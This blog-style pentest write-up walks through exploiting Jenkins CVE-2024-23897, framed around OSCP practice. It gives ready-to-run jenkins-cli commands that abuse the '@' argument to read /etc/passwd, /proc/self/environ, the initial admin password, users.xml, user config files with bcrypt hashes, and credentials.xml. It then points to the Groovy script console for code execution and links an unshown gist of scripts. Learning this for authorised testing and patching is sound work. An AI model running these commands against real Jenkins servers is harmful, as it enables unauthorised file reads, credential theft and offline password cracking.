Notes From the Field: Hacking Jenkins CVE-2024–23897
Jenkins is a highly sought after environment because of wide spread implications on its attack surface, especially if the target installation hasn’t been updated. Its also a favorite of the PEN-200 (OSCP). It’s important to know exploitation vectors of Jenkins such as default passwords that may be in use, and knowing how to exploit using groovy scripts for initial access.
This post will dive into how to read arbitrary files from a Jenkins server running on linux and recover encrypted bcrypt hashed passwords for offline cracking.
So what is CVE-2024–23897 and how can I leverage it for exploitation?
The interesting part is the way this vulnerability will process CLI commands when using the built in command line interface. The use of “@” is extremely important.
On Jenkins installation you can pull the command line interface Java utility from the target server using the following command:
wget <ip>:<port>/jnlpJars/jenkins-cli.jar
Once you have the cli client downloaded this syntaxt in the CLI is what we will be using alot.
java -jar jenkins-cli.jar -s <jenkins_url> <command>
Some useful commands I for directory searches and hunting of secrets:
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/secrets/initilAdminPassword
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/etc/passwd
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/proc/self/environ
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/users.xml
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/<user_folder>/config.xml
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/credentials.xml
Examples of useful commands in action:
Finding jenkins users
Dumping bcrypt hashes from user folder
Once you are inside a Jenkins box you can execute some groovy scripts by going directly into the script console. If you want to go there directly you can do this:
<web_url>:<port>/script
This will take you too a groovy console as shown below:
So medium is being slightly weird and will not let me post groovy scripts in this post so I made a public gist instead. It can be found here:
https://gist.github.com/rootsecdev/273f22a747753e2b17a2fd19c248c4b7